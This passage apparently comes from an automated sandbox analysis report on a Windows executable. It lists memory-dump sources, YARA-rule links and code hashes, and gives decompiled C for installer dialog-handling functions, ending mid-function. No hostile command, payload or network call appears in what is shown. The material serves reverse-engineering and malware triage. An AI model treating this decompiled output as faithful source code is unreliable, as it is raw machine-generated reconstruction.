                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: FileFindFirst
                                                                            • String ID:
                                                                            • API String ID: 1974802433-0
                                                                            • Opcode ID: a2663e28504c86572081c005267ca85bcb47b559b3db158810a8a5f7ec55b55d
                                                                            • Instruction ID: a7d85d328faede53e6a1e3b4f28690110558ed3aa0613785cbf8ce06a9006afe
                                                                            • Opcode Fuzzy Hash: a2663e28504c86572081c005267ca85bcb47b559b3db158810a8a5f7ec55b55d
                                                                            • Instruction Fuzzy Hash: 35F0A771704111EED710EB649A49AEEB7A8DF51314F20067FF112B60C1D7B88946972A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0311185E, Relevance: .0, Instructions: 33COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.225530478.0000000003110000.00000040.00000001.sdmp, Offset: 03110000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
                                                                            • Instruction ID: c2486b15da70147c97e970bfb718520cdf00106ffa9e875beb8d31149d3a8b7c
                                                                            • Opcode Fuzzy Hash: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
                                                                            • Instruction Fuzzy Hash: AF014C79A10208EFCB50DF98C58099DFBF4FB08220B1585A5ED04E7321D334AE509B40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 03111646, Relevance: .0, Instructions: 10COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.225530478.0000000003110000.00000040.00000001.sdmp, Offset: 03110000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                                            • Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
                                                                            • Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
                                                                            • Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00404CB1, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 491windowmemoryCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 96%
                                                                            			E00404CB1(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t203;
				intOrPtr _t206;
				intOrPtr _t207;
				long _t212;
				signed int _t216;
				signed int _t227;
				void* _t230;
				void* _t231;
				int _t237;
				long _t242;
				long _t243;
				signed int _t244;
				signed int _t250;
				signed int _t252;
				signed char _t253;
				signed char _t259;
				void* _t264;
				void* _t266;
				signed char* _t284;
				signed char _t285;
				long _t290;
				signed int _t300;
				signed int _t308;
				signed char* _t316;
				int _t320;
				int _t321;
				signed int* _t322;
				int _t323;
				long _t324;
				signed int _t325;
				long _t327;
				int _t328;
				signed int _t329;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_v8 = GetDlgItem(_a4, 0x408);
				_t331 = SendMessageA;
				_v24 =  *0x424788;
				_v28 =  *0x424754 + 0x94;
				_t320 = 0x10;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t298 = _a16;
					} else {
						_a12 = 0;
						_t298 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t298;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t298 + 4)) == 0x408) {
							if(( *0x42475d & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t242 = _v16;
									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, 0,  *(_t242 + 0x5c));
									}
									_t243 = _v16;
									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe6a) {
										_t298 = _v24;
										_t244 =  *(_t243 + 0x5c);
										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) & 0xffffffdf;
										} else {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t298 = 0 | _a8 != 0x00000413;
								_t250 = E00404BFF(_v8, _a8 != 0x413);
								_t325 = _t250;
								if(_t325 >= 0) {
									_t99 = _v24 + 8; // 0x8
									_t298 = _t250 * 0x418 + _t99;
									_t252 =  *_t298;
									if((_t252 & 0x00000010) == 0) {
										if((_t252 & 0x00000040) == 0) {
											_t253 = _t252 ^ 0x00000001;
										} else {
											_t259 = _t252 ^ 0x00000080;
											if(_t259 >= 0) {
												_t253 = _t259 & 0x000000fe;
											} else {
												_t253 = _t259 | 0x00000001;
											}
										}
										 *_t298 = _t253;
										E0040117D(_t325);
										_a12 = _t325 + 1;
										_a16 =  !( *0x42475c) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t298 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t230 =  *0x420d34;
								if(_t230 != 0) {
									ImageList_Destroy(_t230);
								}
								_t231 =  *0x420d48;
								if(_t231 != 0) {
									GlobalFree(_t231);
								}
								 *0x420d34 = 0;
								 *0x420d48 = 0;
								 *0x4247c0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42475d & 0x00000001) != 0) {
									_t321 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t321);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t321);
								}
								goto L93;
							} else {
								E004011EF(_t298, 0, 0);
								_t203 = _a12;
								if(_t203 != 0) {
									if(_t203 != 0xffffffff) {
										_t203 = _t203 - 1;
									}
									_push(_t203);
									_push(8);
									E00404C7F();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t298, 0, 0);
									_v36 =  *0x420d48;
									_t206 =  *0x424788;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42478c <= 0) {
										L86:
										if( *0x42474c == 4) {
											InvalidateRect(_v8, 0, 1);
										}
										_t207 =  *0x423f1c; // 0x71ad46
										if( *((intOrPtr*)(_t207 + 0x10)) != 0) {
											E00404BBA(0x3ff, 0xfffffffb, E00404BD2(5));
										}
										goto L90;
									}
									_t322 = _t206 + 8;
									do {
										_t212 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t212 != 0) {
											_t300 =  *_t322;
											_v72 = _t212;
											_v76 = 8;
											if((_t300 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t322[4]);
												_t322[0] = _t322[0] & 0x000000fe;
											}
											if((_t300 & 0x00000040) == 0) {
												_t216 = (_t300 & 0x00000001) + 1;
												if((_t300 & 0x00000010) != 0) {
													_t216 = _t216 + 3;
												}
											} else {
												_t216 = 3;
											}
											_v68 = (_t216 << 0x0000000b | _t300 & 0x00000008) + (_t216 << 0x0000000b | _t300 & 0x00000008) | _t300 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t300 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageA(_v8, 0x110d, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t322 =  &(_t322[0x106]);
									} while (_v24 <  *0x42478c);
									goto L86;
								} else {
									_t323 = E004012E2( *0x420d48);
									E00401299(_t323);
									_t227 = 0;
									_t298 = 0;
									if(_t323 <= 0) {
										L74:
										SendMessageA(_v12, 0x14e, _t298, 0);
										_a16 = _t323;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t227 * 4)) != 0) {
											_t298 = _t298 + 1;
										}
										_t227 = _t227 + 1;
									} while (_t227 < _t323);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t237 = SendMessageA(_v12, 0x147, 0, 0);
							if(_t237 == 0xffffffff) {
								goto L93;
							}
							_t324 = SendMessageA(_v12, 0x150, _t237, 0);
							if(_t324 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t324 * 4)) == 0) {
								_t324 = 0x20;
							}
							E00401299(_t324);
							SendMessageA(_a4, 0x420, 0, _t324);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					 *0x4247c0 = _a4;
					_v20 = 2;
					 *0x420d48 = GlobalAlloc(0x40,  *0x42478c << 2);
					_t264 = LoadImageA( *0x424740, 0x6e, 0, 0, 0, 0);
					 *0x420d3c =  *0x420d3c | 0xffffffff;
					_v16 = _t264;
					 *0x420d44 = SetWindowLongA(_v8, 0xfffffffc, E004052C3);
					_t266 = ImageList_Create(_t320, _t320, 0x21, 6, 0);
					 *0x420d34 = _t266;
					ImageList_AddMasked(_t266, _v16, 0xff00ff);
					SendMessageA(_v8, 0x1109, 2,  *0x420d34);
					if(SendMessageA(_v8, 0x111c, 0, 0) < _t320) {
						SendMessageA(_v8, 0x111b, _t320, 0);
					}
					DeleteObject(_v16);
					_t327 = 0;
					do {
						_t272 =  *((intOrPtr*)(_v28 + _t327 * 4));
						if( *((intOrPtr*)(_v28 + _t327 * 4)) != 0) {
							if(_t327 != 0x20) {
								_v20 = 0;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, 0, E004062BB(0, _t327, _t331, 0, _t272)), _t327);
						}
						_t327 = _t327 + 1;
					} while (_t327 < 0x21);
					_t328 = _a16;
					_push( *((intOrPtr*)(_t328 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004042AC(_a4);
					_push( *((intOrPtr*)(_t328 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004042AC(_a4);
					_t329 = 0;
					_v16 = 0;
					if( *0x42478c <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t316 = _v24 + 8;
						_v32 = _t316;
						do {
							_t284 =  &(_t316[0x10]);
							if( *_t284 != 0) {
								_v64 = _t284;
								_t285 =  *_t316;
								_v88 = _v16;
								_t308 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t308;
								_v44 = _t329;
								_v72 = _t285 & _t308;
								if((_t285 & 0x00000002) == 0) {
									if((_t285 & 0x00000004) == 0) {
										 *( *0x420d48 + _t329 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v88);
									} else {
										_v16 = SendMessageA(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t290 = SendMessageA(_v8, 0x1100, 0,  &_v88);
									_v36 = 1;
									 *( *0x420d48 + _t329 * 4) = _t290;
									_v16 =  *( *0x420d48 + _t329 * 4);
								}
							}
							_t329 = _t329 + 1;
							_t316 =  &(_v32[0x418]);
							_v32 = _t316;
						} while (_t329 <  *0x42478c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004042E1(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004042E1(_v12);
								L93:
								return E00404313(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                                                            0x00404ccf
                                                                            0x00404cd7
                                                                            0x00404cdf
                                                                            0x00404ce5
                                                                            0x00404cfd
                                                                            0x00404d00
                                                                            0x00404d01
                                                                            0x00404f2e
                                                                            0x00404f35
                                                                            0x00404f49
                                                                            0x00404f37
                                                                            0x00404f39
                                                                            0x00404f3c
                                                                            0x00404f3d
                                                                            0x00404f44
                                                                            0x00404f44
                                                                            0x00404f55
                                                                            0x00404f63
                                                                            0x00404f66
                                                                            0x00404f7c
                                                                            0x00404ff1
                                                                            0x00404ff4
                                                                            0x00404ff6
                                                                            0x00405000
                                                                            0x0040500e
                                                                            0x0040500e
                                                                            0x00405010
                                                                            0x0040501a
                                                                            0x00405020
                                                                            0x00405023
                                                                            0x00405026
                                                                            0x00405041
                                                                            0x00405028
                                                                            0x00405032
                                                                            0x00405032
                                                                            0x00405026
                                                                            0x0040501a
                                                                            0x00000000
                                                                            0x00404ff4
                                                                            0x00404f81
                                                                            0x00404f8c
                                                                            0x00404f91
                                                                            0x00404f98
                                                                            0x00404f9d
                                                                            0x00404fa1
                                                                            0x00404fac
                                                                            0x00404fac
                                                                            0x00404fb0
                                                                            0x00404fb4
                                                                            0x00404fb8
                                                                            0x00404fcb
                                                                            0x00404fba
                                                                            0x00404fba
                                                                            0x00404fc1
                                                                            0x00404fc7
                                                                            0x00404fc3
                                                                            0x00404fc3
                                                                            0x00404fc3
                                                                            0x00404fc1
                                                                            0x00404fcf
                                                                            0x00404fd1
                                                                            0x00404fe4
                                                                            0x00404fe7
                                                                            0x00404fea
                                                                            0x00404fea
                                                                            0x00404fb4
                                                                            0x00000000
                                                                            0x00404fa1
                                                                            0x00404f83
                                                                            0x00404f8a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405044
                                                                            0x00405044
                                                                            0x0040504b
                                                                            0x004050bc
                                                                            0x004050c4
                                                                            0x004050cc
                                                                            0x004050cc
                                                                            0x004050d5
                                                                            0x004050d7
                                                                            0x004050de
                                                                            0x004050e1
                                                                            0x004050e1
                                                                            0x004050e7
                                                                            0x004050ee
                                                                            0x004050f1
                                                                            0x004050f1
                                                                            0x004050f7
                                                                            0x004050fd
                                                                            0x00405103
                                                                            0x00405103
                                                                            0x00405110
                                                                            0x00405270
                                                                            0x00405277
                                                                            0x00405294
                                                                            0x0040529a
                                                                            0x004052ac
                                                                            0x004052ac
                                                                            0x00000000
                                                                            0x00405116
                                                                            0x00405118
                                                                            0x0040511d
                                                                            0x00405122
                                                                            0x00405127
                                                                            0x00405129
                                                                            0x00405129
                                                                            0x0040512a
                                                                            0x0040512b
                                                                            0x0040512d
                                                                            0x0040512d
                                                                            0x00405135
                                                                            0x00405176
                                                                            0x00405178
                                                                            0x00405188
                                                                            0x0040518b
                                                                            0x00405190
                                                                            0x00405197
                                                                            0x0040519a
                                                                            0x0040523c
                                                                            0x00405244
                                                                            0x0040524c
                                                                            0x0040524c
                                                                            0x00405252
                                                                            0x0040525a
                                                                            0x0040526b
                                                                            0x0040526b
                                                                            0x00000000
                                                                            0x0040525a
                                                                            0x004051a0
                                                                            0x004051a3
                                                                            0x004051a9
                                                                            0x004051ae
                                                                            0x004051b0
                                                                            0x004051b2
                                                                            0x004051b8
                                                                            0x004051bf
                                                                            0x004051c4
                                                                            0x004051cb
                                                                            0x004051ce
                                                                            0x004051ce
                                                                            0x004051d5
                                                                            0x004051e1
                                                                            0x004051e5
                                                                            0x004051e7
                                                                            0x004051e7
                                                                            0x004051d7
                                                                            0x004051d9
                                                                            0x004051d9
                                                                            0x00405207
                                                                            0x00405213
                                                                            0x00405222
                                                                            0x00405222
                                                                            0x00405224
                                                                            0x00405227
                                                                            0x00405230
                                                                            0x00000000
                                                                            0x00405137
                                                                            0x00405142
                                                                            0x00405145
                                                                            0x0040514a
                                                                            0x0040514c
                                                                            0x00405150
                                                                            0x00405160
                                                                            0x0040516a
                                                                            0x0040516c
                                                                            0x0040516f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00405152
                                                                            0x00405152
                                                                            0x00405158
                                                                            0x0040515a
                                                                            0x0040515a
                                                                            0x0040515b
                                                                            0x0040515c
                                                                            0x00000000
                                                                            0x00405152
                                                                            0x00405135
                                                                            0x00405110
                                                                            0x00405053
                                                                            0x00000000
                                                                            0x00405069
                                                                            0x00405073
                                                                            0x00405078
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040508a
                                                                            0x0040508f
                                                                            0x0040509b
                                                                            0x0040509b
                                                                            0x0040509d
                                                                            0x004050ac
                                                                            0x004050ae
                                                                            0x004050b2
                                                                            0x004050b5
                                                                            0x00000000
                                                                            0x004050b5
                                                                            0x00405053
                                                                            0x00404d07
                                                                            0x00404d0a
                                                                            0x00404d0d
                                                                            0x00404d1d
                                                                            0x00404d30
                                                                            0x00404d3b
                                                                            0x00404d41
                                                                            0x00404d4f
                                                                            0x00404d62
                                                                            0x00404d67
                                                                            0x00404d72
                                                                            0x00404d7b
                                                                            0x00404d91
                                                                            0x00404da1
                                                                            0x00404dad
                                                                            0x00404dad
                                                                            0x00404db2
                                                                            0x00404db8
                                                                            0x00404dba
                                                                            0x00404dbd
                                                                            0x00404dc2
                                                                            0x00404dc7
                                                                            0x00404dc9
                                                                            0x00404dc9
                                                                            0x00404de9
                                                                            0x00404de9
                                                                            0x00404deb
                                                                            0x00404dec
                                                                            0x00404df1
                                                                            0x00404df7
                                                                            0x00404dfb
                                                                            0x00404e00
                                                                            0x00404e08
                                                                            0x00404e0c
                                                                            0x00404e11
                                                                            0x00404e16
                                                                            0x00404e1e
                                                                            0x00404e21
                                                                            0x00404ef0
                                                                            0x00404f03
                                                                            0x00000000
                                                                            0x00404e27
                                                                            0x00404e2a
                                                                            0x00404e2d
                                                                            0x00404e30
                                                                            0x00404e30
                                                                            0x00404e35
                                                                            0x00404e3e
                                                                            0x00404e41
                                                                            0x00404e45
                                                                            0x00404e48
                                                                            0x00404e4b
                                                                            0x00404e54
                                                                            0x00404e5d
                                                                            0x00404e60
                                                                            0x00404e63
                                                                            0x00404e66
                                                                            0x00404ea4
                                                                            0x00404ecf
                                                                            0x00404ea6
                                                                            0x00404eb5
                                                                            0x00404eb5
                                                                            0x00404e68
                                                                            0x00404e6b
                                                                            0x00404e79
                                                                            0x00404e83
                                                                            0x00404e8b
                                                                            0x00404e92
                                                                            0x00404e9d
                                                                            0x00404e9d
                                                                            0x00404e66
                                                                            0x00404ed5
                                                                            0x00404ed6
                                                                            0x00404ee2
                                                                            0x00404ee2
                                                                            0x00404eee
                                                                            0x00404f09
                                                                            0x00404f0c
                                                                            0x00404f29
                                                                            0x00000000
                                                                            0x00404f0e
                                                                            0x00404f13
                                                                            0x00404f1c
                                                                            0x004052ae
                                                                            0x004052c0
                                                                            0x004052c0
                                                                            0x00404f0c
                                                                            0x00000000
                                                                            0x00404eee
                                                                            0x00404e21

                                                                            APIs
                                                                            • GetDlgItem.USER32 ref: 00404CC8
                                                                            • GetDlgItem.USER32 ref: 00404CD5
                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D24
                                                                            • LoadImageA.USER32 ref: 00404D3B
                                                                            • SetWindowLongA.USER32 ref: 00404D55
                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D67
                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404D7B
                                                                            • SendMessageA.USER32(?,00001109,00000002), ref: 00404D91
                                                                            • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404D9D
                                                                            • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404DAD
                                                                            • DeleteObject.GDI32(00000110), ref: 00404DB2
                                                                            • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404DDD
                                                                            • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404DE9
                                                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404E83
                                                                            • SendMessageA.USER32(?,0000110A,00000003,00000110), ref: 00404EB3
                                                                              • Part of subcall function 004042E1: SendMessageA.USER32(00000028,?,00000001,00404111), ref: 004042EF
                                                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404EC7
                                                                            • GetWindowLongA.USER32 ref: 00404EF5
                                                                            • SetWindowLongA.USER32 ref: 00404F03
                                                                            • ShowWindow.USER32(?,00000005), ref: 00404F13
                                                                            • SendMessageA.USER32(?,00000419,00000000,?), ref: 0040500E
                                                                            • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00405073
                                                                            • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00405088
                                                                            • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 004050AC
                                                                            • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 004050CC
                                                                            • ImageList_Destroy.COMCTL32(?), ref: 004050E1
                                                                            • GlobalFree.KERNEL32 ref: 004050F1
                                                                            • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 0040516A
                                                                            • SendMessageA.USER32(?,00001102,?,?), ref: 00405213
                                                                            • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00405222
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0040524C
                                                                            • ShowWindow.USER32(?,00000000), ref: 0040529A
                                                                            • GetDlgItem.USER32 ref: 004052A5
                                                                            • ShowWindow.USER32(00000000), ref: 004052AC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.224713095.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.224707850.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224720434.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224725790.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224731430.0000000000413000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224739553.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224744764.000000000042A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.224748908.000000000042D000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                            • String ID: $M$N
                                                                            • API String ID: 2564846305-813528018
                                                                            • Opcode ID: 2a089ffaa6d080d8f9741abd0f9240871e5015f633a6bdd7d3a40dad24a0061c
                                                                            • Instruction ID: 1f2220219548b190c7fc9fe52a988bdfc75827026f4451c66edb8ee187498390
                                                                            • Opcode Fuzzy Hash: 2a089ffaa6d080d8f9741abd0f9240871e5015f633a6bdd7d3a40dad24a0061c
                                                                            • Instruction Fuzzy Hash: 33025DB0A00209AFDB20DF94DD45AAE7BB5FB84354F10817AF610BA2E1C7789D52DF58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00403DD8, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346windowstringCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 85%
                                                                            			E00403DD8(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t68;
				struct HWND__* _t74;
				signed int _t87;
				struct HWND__* _t92;
				signed int _t100;
				int _t104;
				signed int _t116;
				signed int _t117;
				int _t118;
				signed int _t123;
				struct HWND__* _t126;
				struct HWND__* _t127;
				int _t128;
				long _t131;
				int _t133;
				int _t134;
				void* _t135;
				void* _t143;

				_t116 = _a8;
				if(_t116 == 0x110 || _t116 == 0x408) {
					_t35 = _a12;
					_t126 = _a4;
					__eflags = _t116 - 0x110;
					 *0x420d38 = _t35;
					if(_t116 == 0x110) {
						 *0x424748 = _t126;
						 *0x420d4c = GetDlgItem(_t126, 1);
						_t92 = GetDlgItem(_t126, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41fd18 = _t92;
						E004042AC(_t126);
						SetClassLongA(_t126, 0xfffffff2,  *0x423f28);
						 *0x423f0c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x420d38 = 1;
					}
					_t123 =  *0x40a1f8; // 0xffffffff
					_t134 = 0;
					_t131 = (_t123 << 6) +  *0x424780;
					__eflags = _t123;
					if(_t123 < 0) {
						L34:
						E004042F8(0x40b);
						while(1) {
							_t37 =  *0x420d38;
							 *0x40a1f8 =  *0x40a1f8 + _t37;
							_t131 = _t131 + (_t37 << 6);
							_t39 =  *0x40a1f8; // 0xffffffff
							__eflags = _t39 -  *0x424784;
							if(_t39 ==  *0x424784) {
								E0040140B(1);
							}
							__eflags =  *0x423f0c - _t134; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x40a1f8 -  *0x424784; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t131 + 0x14);
							E004062BB(_t117, _t126, _t131, 0x42c800,  *((intOrPtr*)(_t131 + 0x24)));
							_push( *((intOrPtr*)(_t131 + 0x20)));
							_push(0xfffffc19);
							E004042AC(_t126);
							_push( *((intOrPtr*)(_t131 + 0x1c)));
							_push(0xfffffc1b);
							E004042AC(_t126);
							_push( *((intOrPtr*)(_t131 + 0x28)));
							_push(0xfffffc1a);
							E004042AC(_t126);
							_t49 = GetDlgItem(_t126, 3);
							__eflags =  *0x4247ec - _t134;
							_v32 = _t49;
							if( *0x4247ec != _t134) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t49, _t117 & 0x00000008);
							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100);
							E004042CE(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x41fd18, _t118);
							__eflags = _t118 - _t134;
							if(_t118 == _t134) {
								_push(1);
							} else {
								_push(_t134);
							}
							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
							__eflags =  *0x4247ec - _t134;
							if( *0x4247ec == _t134) {
								_push( *0x420d4c);
							} else {
								SendMessageA(_t126, 0x401, 2, _t134);
								_push( *0x41fd18);
							}
							E004042E1();
							E00406228(0x420d50, E00403DB9());
							E004062BB(0x420d50, _t126, _t131,  &(0x420d50[lstrlenA(0x420d50)]),  *((intOrPtr*)(_t131 + 0x18)));
							SetWindowTextA(_t126, 0x420d50);
							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)), _t134);
							__eflags = _t68;
							if(_t68 != 0) {
								continue;
							} else {
								__eflags =  *_t131 - _t134;
								if( *_t131 == _t134) {
									continue;
								}
								__eflags =  *(_t131 + 4) - 5;
								if( *(_t131 + 4) != 5) {
									DestroyWindow( *0x423f18);
									 *0x420528 = _t131;
									__eflags =  *_t131 - _t134;
									if( *_t131 <= _t134) {
										goto L58;
									}
									_t74 = CreateDialogParamA( *0x424740,  *_t131 +  *0x423f20 & 0x0000ffff, _t126,  *(0x40a1fc +  *(_t131 + 4) * 4), _t131);
									__eflags = _t74 - _t134;
									 *0x423f18 = _t74;
									if(_t74 == _t134) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t131 + 0x2c)));
									_push(6);
									E004042AC(_t74);
									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
									ScreenToClient(_t126, _t135 + 0x10);
									SetWindowPos( *0x423f18, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
									E00401389( *((intOrPtr*)(_t131 + 0xc)), _t134);
									__eflags =  *0x423f0c - _t134; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x423f18, 8);
									E004042F8(0x405);
									goto L58;
								}
								__eflags =  *0x4247ec - _t134;
								if( *0x4247ec != _t134) {
									goto L61;
								}
								__eflags =  *0x4247e0 - _t134;
								if( *0x4247e0 != _t134) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423f18);
						 *0x424748 = _t134;
						EndDialog(_t126,  *0x420120);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t131 - _t134;
							if( *_t131 == _t134) {
								goto L61;
							}
							goto L34;
						}
						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)), 0);
						__eflags = _t87;
						if(_t87 == 0) {
							goto L33;
						}
						SendMessageA( *0x423f18, 0x40f, 0, 1);
						__eflags =  *0x423f0c - _t134; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t126 = _a4;
